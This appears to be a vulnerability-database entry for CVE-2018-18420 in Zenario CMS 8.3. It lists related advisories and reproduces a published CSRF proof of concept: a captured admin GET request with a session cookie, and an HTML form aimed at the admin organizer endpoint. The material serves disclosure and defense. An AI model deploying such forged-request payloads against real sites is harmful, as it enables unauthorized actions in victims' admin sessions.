| Title | Published | Views | Reporter |
|---|---|---|---|
| Zenar Content Management System Cross-Site Request Forgery Vulnerability | 22 Oct 2018 00:00 | – | cnvd |
| CVE-2018-18420 | 19 Oct 2018 22:00 | – | cve |
| CVE-2018-18420 | 19 Oct 2018 22:00 | – | cvelist |
| EUVD-2022-1880 | 3 Oct 2025 20:07 | – | euvd |
| Zenario CMS vulnerable to CSRF | 14 May 2022 01:53 | – | github |
| CVE-2018-18420 | 19 Oct 2018 22:29 | – | nvd |
| CVE-2018-18420 | 19 Oct 2018 22:29 | – | osv |
| GHSA-22CQ-XXR9-JRRV Zenario CMS vulnerable to CSRF | 14 May 2022 01:53 | – | osv |
| Cross site request forgery (csrf) | 19 Oct 2018 22:29 | – | prion |
| Cross-Site Request Forgery (CSRF) | 22 Oct 2018 09:32 | – | veracode |
```text
# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery ( CSRF )
# Date: 2018-05-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://zenar.io/
# Software Link : https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997
# Software : Zenar Content Management System 8.3
# Version : 8.3
# Vulnerability Type : Web Application
# Vulnerability : Cross-Site Request Forgery ( CSRF )
# CVE : CVE-2018-18420
# Cross-Site Request Forgery (CSRF) vulnerability was discovered in
# the 8.3 version of Zenar Content Management System via the
# admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI.
# POC :
# GET Request :
Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest
# Query String Parameters :
path: zenario__content/panels/content
skinId:
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0
# CSRF HTML :
<html><head>
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>
</head><body>
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">
<input type="text" name="html_" value="10" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
```